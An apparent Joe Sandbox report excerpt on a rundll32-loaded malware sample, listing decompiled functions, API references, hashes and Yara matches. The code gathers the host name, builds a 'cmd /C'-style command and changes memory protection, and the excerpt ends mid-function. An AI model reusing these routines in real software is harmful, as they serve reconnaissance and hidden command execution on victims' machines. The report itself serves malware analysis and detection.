                                • Opcode Fuzzy Hash: 31ef8deee4daa51fd6874bc32764ad62e4a900608a4c6daa07723f20ec92933e
                                • Instruction Fuzzy Hash: 66212175900214BFDF11EF66CC40FAEBBB8EF0E640F04445AF904AF250D675D6018BA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 38%
                                			E03431F7A(intOrPtr _a4) {
                                				void* _v12;
                                				char _v16;
                                				void* _v20;
                                				void* _v24;
                                				void* _v28;
                                				char _v32;
                                				intOrPtr _v40;
                                				void* _v46;
                                				short _v48;
                                				intOrPtr _t49;
                                				void* _t51;
                                				intOrPtr* _t53;
                                				intOrPtr _t56;
                                				void* _t58;
                                				intOrPtr* _t59;
                                				intOrPtr* _t61;
                                				intOrPtr* _t63;
                                				intOrPtr* _t65;
                                				intOrPtr* _t67;
                                				intOrPtr* _t69;
                                				intOrPtr* _t71;
                                				short _t73;
                                				intOrPtr* _t74;
                                				intOrPtr _t77;
                                				intOrPtr* _t80;
                                				intOrPtr _t82;
                                				char* _t98;
                                				intOrPtr _t100;
                                				void* _t106;
                                				void* _t108;
                                				intOrPtr _t112;
                                
                                				_v48 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosw");
                                				_t49 =  *0x343a348; // 0x21ad5a8
                                				_t4 = _t49 + 0x343b448; // 0x55e89f0
                                				_t82 = 0;
                                				_t5 = _t49 + 0x343b438; // 0x9ba05972
                                				_t51 =  *0x343a170(_t5, 0, 4, _t4,  &_v20); // executed
                                				_t106 = _t51;
                                				if(_t106 >= 0) {
                                					_t53 = _v20;
                                					_push( &_v12);
                                					_push(1);
                                					_push( &_v32);
                                					_push(8);
                                					_t98 =  &_v48;
                                					_push(_t98);
                                					_push(_t98);
                                					_push(_t53); // executed
                                					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
                                						_t56 =  *0x343a348; // 0x21ad5a8
                                						_t30 = _t56 + 0x343b428; // 0x55e89d0
                                						_t31 = _t56 + 0x343b458; // 0x4c96be40
                                						_t58 =  *0x343a10c(_v12, _t31, _t30,  &_v24); // executed
                                						_t106 = _t58;
                                						_t59 = _v12;
                                						 *((intOrPtr*)( *_t59 + 8))(_t59);
                                						goto L11;
                                					} else {
                                						_t71 = _v20;
                                						_v16 = 0;
                                						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
                                						if(_t106 >= 0) {
                                							_t112 = _v16;
                                							if(_t112 == 0) {
                                								_t106 = 0x80004005;
                                								goto L11;
                                							} else {
                                								if(_t112 <= 0) {
                                									L11:
                                									if(_t106 >= 0) {
                                										goto L12;
                                									}
                                								} else {
                                									do {
                                										_t73 = 3;
                                										_v48 = _t73;
                                										_t74 = _v20;
                                										_v40 = _t82;
                                										_t108 = _t108 - 0x10;
                                										asm("movsd");
                                										asm("movsd");
                                										asm("movsd");
                                										asm("movsd");
                                										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
                                										if(_t106 < 0) {
                                											goto L7;
                                										} else {
                                											_t77 =  *0x343a348; // 0x21ad5a8
                                											_t23 = _t77 + 0x343b428; // 0x55e89d0
                                											_t24 = _t77 + 0x343b458; // 0x4c96be40
                                											_t106 =  *0x343a10c(_v12, _t24, _t23,  &_v24);
                                											_t80 = _v12;
                                											 *((intOrPtr*)( *_t80 + 8))(_t80);
                                											if(_t106 >= 0) {
                                												L12:
                                												_t63 = _v24;
                                												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
                                												if(_t106 >= 0) {
                                													_t100 =  *0x343a348; // 0x21ad5a8
                                													_t67 = _v28;
                                													_t40 = _t100 + 0x343b418; // 0x214e3
                                													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
                                													_t69 = _v28;
                                													 *((intOrPtr*)( *_t69 + 8))(_t69);
                                												}
                                												_t65 = _v24;
                                												 *((intOrPtr*)( *_t65 + 8))(_t65);
                                											} else {
                                												goto L7;
                                											}
                                										}
                                										goto L15;
                                										L7:
                                										_t82 = _t82 + 1;
                                									} while (_t82 < _v16);
                                									goto L11;
                                								}
                                							}
                                						}
                                					}
                                					L15:
                                					_t61 = _v20;
                                					 *((intOrPtr*)( *_t61 + 8))(_t61);
                                				}
                                				return _t106;
                                			}

                                APIs
                                • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,055E89D0,03433F35,?,?,?,?,?,?,?,?,?,?,?,03433F35), ref: 03432047
                                • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,055E89D0,03433F35,?,?,?,?,?,?,?,03433F35,00000000,00000000,00000000,006D0063), ref: 03432085
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: QueryServiceUnknown_
                                • String ID:
                                • API String ID: 2042360610-0
                                • Opcode ID: 1bdf7446f7ed1ed8063cd57e11bd6d1395e09efc75c59aee2d15ae1c4291208b
                                • Instruction ID: d0e333b9106e25a68c3bd69ae8d391effda55839edc7ec0e713ce88d1b2474be
                                • Opcode Fuzzy Hash: 1bdf7446f7ed1ed8063cd57e11bd6d1395e09efc75c59aee2d15ae1c4291208b
                                • Instruction Fuzzy Hash: 0C513F75900219AFCB00DFE4C888EEEB7B8FF4D710B148959EA05EF250D671AD45CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 75%
                                			E034346CB(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                				void* _v8;
                                				void* __esi;
                                				intOrPtr _t20;
                                				intOrPtr* _t35;
                                				void* _t40;
                                				intOrPtr* _t41;
                                				intOrPtr* _t43;
                                				intOrPtr* _t45;
                                				intOrPtr* _t50;
                                				intOrPtr* _t52;
                                				void* _t54;
                                				intOrPtr* _t55;
                                				intOrPtr* _t57;
                                				intOrPtr* _t61;
                                				intOrPtr* _t65;
                                				intOrPtr _t68;
                                				void* _t72;
                                				void* _t75;
                                				void* _t76;
                                
                                				_t55 = _a4;
                                				_t35 =  *((intOrPtr*)(_t55 + 4));
                                				_a4 = 0;
                                				// Indirect COM call through the object's vtable (slot at offset 0x4c); _v8 receives an interface pointer, _t76 the HRESULT
                                				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                				if(_t76 < 0) {
                                					L18:
                                					return _t76;
                                				}
                                				// Subcall 034374FE builds BSTRs (SysAllocString/SysFreeString in the API list below) and returns them via _a20 and _a12
                                				_t40 = E034374FE(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                				_t76 = _t40;
                                				if(_t76 >= 0) {
                                					_t61 = _a28;
                                					if(_t61 != 0 &&  *_t61 != 0) {
                                						_t52 = _v8;
                                						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0); // vtable slot at offset 0x14
                                					}
                                					if(_t76 >= 0) {
                                						_t43 =  *_t55;
                                						_t68 =  *0x343a348; // 0x21ad5a8, relocation base for string data
                                						_t20 = _t68 + 0x343b1fc; // 0x740053, a UTF-16 string constant passed to the call below
                                						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0); // vtable slot at offset 0x60; returns a new interface in _a4
                                						if(_t76 >= 0) {
                                							_t76 = E034365D1(_a4);
                                							if(_t76 >= 0) {
                                								_t65 = _a28;
                                								if(_t65 != 0 &&  *_t65 == 0) {
                                									_t50 = _a4;
                                									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0); // vtable slot at offset 0x10
                                								}
                                							}
                                						}
                                						_t45 = _a4;
                                						if(_t45 != 0) {
                                							 *((intOrPtr*)( *_t45 + 8))(_t45); // vtable offset 8: IUnknown::Release
                                						}
                                						_t57 = __imp__#6; // OLEAUT32 ordinal 6 = SysFreeString (refs 034347AA and 034347B4 in the API list below)
                                						if(_a20 != 0) {
                                							 *_t57(_a20);
                                						}
                                						if(_a12 != 0) {
                                							 *_t57(_a12);
                                						}
                                					}
                                				}
                                				_t41 = _v8;
                                				 *((intOrPtr*)( *_t41 + 8))(_t41); // IUnknown::Release on the interface obtained at the top
                                				goto L18;
                                			}

                                APIs
                                  • Part of subcall function 034374FE: SysAllocString.OLEAUT32(80000002), ref: 0343755B
                                  • Part of subcall function 034374FE: SysFreeString.OLEAUT32(00000000), ref: 034375C1
                                • SysFreeString.OLEAUT32(?), ref: 034347AA
                                • SysFreeString.OLEAUT32(03433520), ref: 034347B4
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: 0427ecd0c3a0507cd6f8372526745ea181610c3c0e06cad6deb733675f2b32e8
                                • Instruction ID: e61a63f0f5238773d430f7138185c5fccdbba4127c6c92dd3b9f8bfe9a369efa
                                • Opcode Fuzzy Hash: 0427ecd0c3a0507cd6f8372526745ea181610c3c0e06cad6deb733675f2b32e8
                                • Instruction Fuzzy Hash: 84315979500118AFCB21EFAAC888CDBBBBAEBCA7507244659F9059B310D7319D51CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 50%
                                			E03435634(intOrPtr* __eax, intOrPtr _a4) {
                                				void* _v8;
                                				void* _v12;
                                				void* _v16;
                                				intOrPtr _t2;
                                				intOrPtr _t6;
                                				intOrPtr _t12;
                                				intOrPtr* _t22;
                                				void* _t23;
                                				intOrPtr* _t24;
                                				intOrPtr* _t26;
                                				intOrPtr* _t28;
                                				intOrPtr* _t30;
                                				void* _t31;
                                				intOrPtr* _t32;
                                				intOrPtr _t42;
                                				intOrPtr _t45;
                                				intOrPtr _t48;
                                				void* _t51;
                                
                                				_push( &_v16);
                                				_t42 =  *0x343a348; // 0x21ad5a8, relocation base for constant data
                                				_t2 = _t42 + 0x343b468; // 0x20400; computed here but not visible as an argument in the decompilation
                                				_push(0);
                                				_push(__eax);
                                				// Indirect COM call (vtable slot at offset 0x3c); _v16 receives an interface pointer, _t51 the HRESULT
                                				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
                                				if(_t51 >= 0) {
                                					_t22 = _v16;
                                					_t45 =  *0x343a348; // 0x21ad5a8
                                					_t6 = _t45 + 0x343b488; // 0xe7a1af80, first IID passed to QueryInterface
                                					// vtable offset 0: IUnknown::QueryInterface (IUnknown_QueryInterface_Proxy at 03435671 in the API list below)
                                					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
                                					_t51 = _t23;
                                					if(_t51 >= 0) {
                                						_t26 = _v12;
                                						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8); // vtable slot at offset 0x1c; _v8 receives another interface
                                						if(_t51 >= 0) {
                                							_t48 =  *0x343a348; // 0x21ad5a8
                                							_t30 = _v8;
                                							_t12 = _t48 + 0x343b478; // 0xa4c6892c, second IID passed to QueryInterface
                                							// vtable offset 0: IUnknown::QueryInterface (IUnknown_QueryInterface_Proxy at 034356A2); the result lands in the caller's _a4
                                							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
                                							_t51 = _t31;
                                							_t32 = _v8;
                                							 *((intOrPtr*)( *_t32 + 8))(_t32); // IUnknown::Release
                                						}
                                						_t28 = _v12;
                                						 *((intOrPtr*)( *_t28 + 8))(_t28); // IUnknown::Release
                                					}
                                					_t24 = _v16;
                                					 *((intOrPtr*)( *_t24 + 8))(_t24); // IUnknown::Release
                                				}
                                				return _t51;
                                			}

                                APIs
                                • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 03435671
                                • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 034356A2
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Interface_ProxyQueryUnknown_
                                • String ID:
                                • API String ID: 2522245112-0
                                • Opcode ID: b318840ef9243cfd0f2564ded2cb53649658bd4c4e8c9528c47fb4e80453d7dc
                                • Instruction ID: 975ec15e9ae25a47ee81bced2abab20d0b19ff4c9c9841fff40e0fdc5e856d1d
                                • Opcode Fuzzy Hash: b318840ef9243cfd0f2564ded2cb53649658bd4c4e8c9528c47fb4e80453d7dc
                                • Instruction Fuzzy Hash: 0F21E275900619EFCB00DBA4C444E9AF779EF89714B148698ED45EF324D631ED41CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000,?), ref: 03483253
                                • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000), ref: 0348329A
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                                • String ID:
                                • API String ID: 552344955-0
                                • Opcode ID: abfb30bddeeaa7b99e8d447a340bec3942e1c2a35536487e4e9b5af36f4d79fe
                                • Instruction ID: 58138fcab65638617a539901c1d4b75003d7e7538ac9b4abe7f7b7de3999fedb
                                • Opcode Fuzzy Hash: abfb30bddeeaa7b99e8d447a340bec3942e1c2a35536487e4e9b5af36f4d79fe
                                • Instruction Fuzzy Hash: C9115279900208ABDB11FFAAC854B9FBBB8EF95A54F24445EE4009F250DB748A45CB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,034802F2,69B25F44,?,?,00000000), ref: 034893AD
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,034802F2), ref: 0348940E
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$FileFreeHeapSystem
                                • String ID:
                                • API String ID: 892271797-0
                                • Opcode ID: ca51c3b925cab6bd420947161fb5402f52c4d808c14d00be2dd0ff0806abe62f
                                • Instruction ID: 5b75dfeb66acc77658bbd3f765d387b790091f24f83c1dbfab02a7f4d9d7a8e7
                                • Opcode Fuzzy Hash: ca51c3b925cab6bd420947161fb5402f52c4d808c14d00be2dd0ff0806abe62f
                                • Instruction Fuzzy Hash: 57110AB9D00208FFCB11FBA9D945ADEB7FCAB18205F1440A7A902FA244D7749B48DB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 03431267
                                  • Part of subcall function 034346CB: SysFreeString.OLEAUT32(?), ref: 034347AA
                                • SafeArrayDestroy.OLEAUT32(?), ref: 034312B7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: ArraySafe$CreateDestroyFreeString
                                • String ID:
                                • API String ID: 3098518882-0
                                • Opcode ID: af671ccfef14402a67402800cc4cffc302e112d0eaf9e51f0f1eb53209adc728
                                • Instruction ID: 45fdbda7dfa6e6a3e4b0dae4723a0572e5850f80cb6d6e8a35943c80b00a1cf6
                                • Opcode Fuzzy Hash: af671ccfef14402a67402800cc4cffc302e112d0eaf9e51f0f1eb53209adc728
                                • Instruction Fuzzy Hash: 4D115275900209BFDB01EFA5D805EEEB7B9EF08750F008115EA04FB260E7759A158B95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(03437283), ref: 0343150A
                                  • Part of subcall function 034346CB: SysFreeString.OLEAUT32(?), ref: 034347AA
                                • SysFreeString.OLEAUT32(00000000), ref: 0343154B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: 5fb363bf26729fb404a1b2f803c3f5ce2b312ecb1d5a15bef45564be409dfbf3
                                • Instruction ID: 94c42948f38c0f180a0e76967c29888b3f738ac6c4622484898273a4ad0f8a7b
                                • Opcode Fuzzy Hash: 5fb363bf26729fb404a1b2f803c3f5ce2b312ecb1d5a15bef45564be409dfbf3
                                • Instruction Fuzzy Hash: F5016235500219BFDF41EFA9D905EEF7BB8EF48710B044126F909EB220D7709A15CBA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E034322D7(void* __ecx) {
                                				signed int _v8;
                                				signed int _t10;
                                				void* _t15;
                                				void* _t19;
                                				void* _t20;
                                				void* _t22;
                                				intOrPtr* _t23;
                                
                                				_t23 = __imp__; // KERNEL32!GetComputerNameExA (refs 034322EF and 0343230C in the API list below)
                                				_t20 = 0;
                                				_v8 = _v8 & 0;
                                				// First call with a NULL buffer: format 3 = ComputerNameDnsFullyQualified; _v8 receives the required size
                                				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                				_t10 = _v8;
                                				if(_v8 != 0) {
                                					_t20 = E03436D63(_t10 + 1); // heap allocation (RtlAllocateHeap), one extra byte for the terminator
                                					if(_t20 != 0) {
                                						// Second call fills the buffer with the fully qualified host name
                                						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                						if(_t15 != 0) {
                                							 *((char*)(_v8 + _t20)) = 0; // NUL-terminate at the returned length
                                						} else {
                                							E03436C2C(_t20); // heap free (RtlFreeHeap) on failure
                                							_t20 = 0;
                                						}
                                					}
                                				}
                                				return _t20; // heap string with the host name, or 0
                                			}

                                APIs
                                • GetComputerNameExA.KERNEL32(00000003,00000000,034357B5,00000000,00000000,?,75BCC740,034357B5), ref: 034322EF
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • GetComputerNameExA.KERNEL32(00000003,00000000,034357B5,034357B6,?,75BCC740,034357B5), ref: 0343230C
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: ComputerHeapName$AllocateFree
                                • String ID:
                                • API String ID: 187446995-0
                                • Opcode ID: 6dc3de862436670141eb45c2246ae8b93120ce89f86eaa23f4843bc947674c52
                                • Instruction ID: e5b0a2949dd697c8c131d09ec84b104d5c4feb6166ff0d4aa5316cddf05a5554
                                • Opcode Fuzzy Hash: 6dc3de862436670141eb45c2246ae8b93120ce89f86eaa23f4843bc947674c52
                                • Instruction Fuzzy Hash: 53F05B26600205BAE711D666CC40FAF76FCDBCA550F15045AE944DB144D6F0DE018676
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E034378BF(WCHAR* _a4) {
                                				void* __edi;
                                				intOrPtr _t5;
                                				intOrPtr _t6;
                                				intOrPtr _t7;
                                				intOrPtr _t11;
                                				intOrPtr _t14;
                                				void* _t16;
                                				void* _t18;
                                				WCHAR* _t20;
                                
                                				// Heap allocation (RtlAllocateHeap) sized from the argument's length; _t7 is an undeclared decompiler temporary in the original output
                                				_t20 = E03436D63(lstrlenW(_a4) + _t7 + 0x5c);
                                				if(_t20 == 0) {
                                					_t18 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                				} else {
                                					_t11 =  *0x343a348; // 0x21ad5a8, relocation base for string data
                                					_t5 = _t11 + 0x343ba70; // 0x43002f: wsprintfW format string, first two UTF-16 units are L"/C"
                                					wsprintfW(_t20, _t5, 5, _a4); // formats the argument into the freshly allocated buffer
                                					_t14 =  *0x343a348; // 0x21ad5a8
                                					_t6 = _t14 + 0x343b900; // 0x6d0063: second string constant, first two UTF-16 units are L"cm"
                                					_t16 = E03437928(0, _t6, _t20, 0); // executed; subcall uses memset and GetLastError (see API list below)
                                					_t18 = _t16;
                                					E03436C2C(_t20); // heap free (RtlFreeHeap)
                                				}
                                				return _t18;
                                			}

                                APIs
                                • lstrlenW.KERNEL32(76CDF710,00000000,?,034371A6,00000000,?,76CDF710,00000000,76CDF730), ref: 034378C5
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • wsprintfW.USER32 ref: 034378EE
                                  • Part of subcall function 03437928: memset.NTDLL ref: 0343794B
                                  • Part of subcall function 03437928: GetLastError.KERNEL32 ref: 03437997
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
• Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
                                • String ID:
                                • API String ID: 1672627171-0
                                • Opcode ID: d7c8b546a0314c8a8e775e880a53a54b8b049c68a0a61581fbf7e54f617a0b0c
                                • Instruction ID: 45ed328149938f632950a2a51feb9342e38cfd256a53c24db4956354604053ab
                                • Opcode Fuzzy Hash: d7c8b546a0314c8a8e775e880a53a54b8b049c68a0a61581fbf7e54f617a0b0c
                                • Instruction Fuzzy Hash: 52F02432100614AFD610EB65DC44FAB3BDCEF89710F064417FA84EF115C63098128B69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlEnterCriticalSection.NTDLL(0349A400), ref: 0348E873
                                • RtlLeaveCriticalSection.NTDLL(0349A400), ref: 0348E8AF
                                  • Part of subcall function 03471A0A: lstrlen.KERNEL32(?,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000,?,00000000,03490977,0348893A,?,?), ref: 03471A58
                                  • Part of subcall function 03471A0A: VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000,?,00000000,03490977), ref: 03471A6A
                                  • Part of subcall function 03471A0A: lstrcpy.KERNEL32(00000000,?), ref: 03471A79
                                  • Part of subcall function 03471A0A: VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000,?,00000000,03490977), ref: 03471A8A
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                                • String ID:
                                • API String ID: 1872894792-0
                                • Opcode ID: 91203e4bb3514c6c37b5bb7c784aa85d3ce15a17eec797997df4ac604a02ff16
                                • Instruction ID: 6236308b0387554e4995f9fd059846aa0d59a9913fa955b34d484503936245e7
                                • Opcode Fuzzy Hash: 91203e4bb3514c6c37b5bb7c784aa85d3ce15a17eec797997df4ac604a02ff16
                                • Instruction Fuzzy Hash: 36F05C352012158FC730FF19948886DFB98EF89111326419FEC115F301C7315C8186D0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • InterlockedIncrement.KERNEL32(0349A05C), ref: 0347C9BE
                                  • Part of subcall function 03482331: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0348235C
                                  • Part of subcall function 03482331: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 03482369
                                  • Part of subcall function 03482331: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 034823F5
                                  • Part of subcall function 03482331: GetModuleHandleA.KERNEL32(00000000), ref: 03482400
                                  • Part of subcall function 03482331: RtlImageNtHeader.NTDLL(00000000), ref: 03482409
                                  • Part of subcall function 03482331: RtlExitUserThread.NTDLL(00000000), ref: 0348241E
                                • InterlockedDecrement.KERNEL32(0349A05C), ref: 0347C9E2
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                                • String ID:
                                • API String ID: 1011034841-0
                                • Opcode ID: 9cf3dc852f6cb143916e5dce2a01d9884c5b438516e849396fb7c551e8d70022
                                • Instruction ID: ca9eb06d22b10c3b840813bfe558d3b625b690268456d961560888d9f92df61c
                                • Opcode Fuzzy Hash: 9cf3dc852f6cb143916e5dce2a01d9884c5b438516e849396fb7c551e8d70022
                                • Instruction Fuzzy Hash: 3FE0D872248222DBDF62EB759884B9FBA54AB01680F15061BF945FC104C610CC50CBD9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E03431CD6(signed int __edx, intOrPtr _a4) {
                                				void* _t3;
                                				void* _t5;
                                				void* _t7;
                                				void* _t8;
                                				void* _t9;
                                				signed int _t10;
                                
                                				_t10 = __edx;
                                				_t3 = HeapCreate(0, 0x400000, 0); // executed
                                				 *0x343a2d8 = _t3;
                                				if(_t3 == 0) {
